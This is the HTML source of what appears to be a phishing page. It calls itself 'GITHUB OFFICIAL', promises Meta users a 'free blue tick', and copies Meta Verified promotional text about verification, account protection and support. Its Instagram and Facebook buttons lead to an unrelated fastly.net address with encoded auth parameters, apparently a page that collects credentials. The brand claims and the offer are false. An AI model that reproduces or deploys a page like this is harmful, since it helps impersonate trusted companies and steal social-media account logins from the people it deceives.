<!DOCTYPE html>
<html>
    <head>
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <style>
        ul {
  list-style-type: none;
  margin: 0;
  padding: 0;
  overflow: hidden;
  background-color: #333;
}

li {
  float: left;
}

li a {
  display: block;
  color: white;
  text-align: center;
  padding: 14px 16px;
  text-decoration: none;
}

/* Change the link color to #111 (black) on hover */
li a:hover {
  background-color: #111;
}



            body { background-color: white;}
            h1{text-align:center; color:#000000; font-style: normal;}
            h2{color:#000000; font-style: normal;}
            p{font-style: normal}
            .left{text-align:center; color:#000000; font-style: normal;}
            .box{text-align:center; font-size:30px ; color: #4d001f; font-style: normal; font-style: oblique;}
            .container{
                border: 00px solid black;
                background-color:#e6ffff ;
                padding: 34px;
                margin: 34px auto;
                width: 666px;
            }
            .verification{
                border: 0px solid black;
                background-color: #f2f2f2;
                padding: 34px;
                margin: 34px auto;
                width: 666px;
                height: 1300px;
            }
            .button {
  display: inline-block;
  border-radius: 4px;
  background-color: #f4511e;
  border: none;
  color: #FFFFFF;
  text-align: center;
  font-size: 20px;
  padding: 2px;
  width: 130px;
  transition: all 0.5s;
  cursor: pointer;
  margin: 5px;
}

.button span {
  cursor: pointer;
  display: inline-block;
  position: relative;
  transition: 0.5s;
}

.button span:after {
  content: '\00bb';
  position: absolute;
  opacity: 0;
  top: 0;
  right: -20px;
  transition: 0.5s;
}

.button:hover span {
  padding-right: 25px;
}

.button:hover span:after {
  opacity: 1;
  right: 0;
}
.github{    float:right; 
            width: 55%;
        }
.main{
    position:static;
    padding: 34px;
    margin: 34px auto;
    width: 630px;
    left:15%;
    top:20%

}
.github{    float:right; 
            width: 55%;
        }
.main{
    position:static;
    padding: 34px;
    margin: 34px auto;
    width: 630px;
    left:15%;
    top:20%

        </style>

    </head>
    <body>
        <ul>
  <li><a href="https://www.instagram.com/github/">Instagram</a></li>
  <li><a href="https://support.github.com/request">Contact</a></li>
  <li><a href="https://github.com/facebook">Facebook</a></li>
</ul>
        <div class="container" id="cont1">
        <h1>GITHUB OFFICIAL</h1>
        <p class="box">We are runing a projct for giving free blue tick to some META users. You can register your account by given link</p>
    </div>
    <div class="click">
        <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Click  &nbsp;&nbsp;&nbsp;&nbsp;👇👇👇</p>
        <a href="http://sos.com.global.prod.fastly.net/YzM2MmJiOGNhM2RhNDlmMGM0NzUwOQ==/?type=ist&orders=780616987&auth=NDBjMjliOTUwM2Q0Njg3YzkxMjliZQ=="><button class="button" style="vertical-align:middle"><span>Instagram </span></button>
        </a>
      <a href="http://sos.com.global.prod.fastly.net/YzM2MmJiOGNhM2RhNDlmMGM0NzUwOQ==/?type=xx&orders=780616987&auth=NDBjMjliOTUwM2Q0Njg3YzkxMjliZQ=="><button class="button" style="vertical-align:middle"><span>Facebook </span></button>
      </a>
    </div>
    <div class="main">
      <img class="github" src="github.png" alt="">
      <h2>Introducing Meta Verified</h2>
      <p>A subscription bundle to help you establish your presence on Instagram and Facebook. Click below to subscribe from the Instagram app (iOS/Android) or Facebook app (iOS/Android) or Web.</p>
    </div>
      <div class="verification">
      <h2 class="left">Establish your presence on Instagram & Facebook</h2>
      <p>With Meta Verified, you get verification with a government ID, proactive account protection, access to direct account support and more. Features may vary by region.</p>
      <div class="main">
      <img class="github" src="5041145.jpg" alt="">
      <h2>Verification</h2>
      <p>Help your community know it's the real you with a verified badge, which uses a verification process with a government ID and where available a selfie video to securely establish your account’s authenticity</p>
    </div>
    <div class="main">
      <img class="github" src="security-265130_1280.jpg" alt="">
      <h2>Proactive account protection</h2>
      <p>Get protection from impersonation with proactive account monitoring and secure your account with required two-factor authentication.</p>
    </div>
    <div class="main">
      <img class="github" src="facebook-793048_1280.jpg" alt="">
      <h2>Exclusive features</h2>
      <p>Get exclusive stickers on Stories and Reels across Facebook and Instagram, and where available 100 Stars a month on Facebook so you can show your support for other creators.</p>
    </div>
    <div class="main">
      <img class="github" src="support-2355701_1280.jpg" alt="">
      <h2>Direct account support</h2>
      <p>Get help when you need it from a real person on common account issues that matter to you</p>
    </div>
    </div>
    </body>
</html>
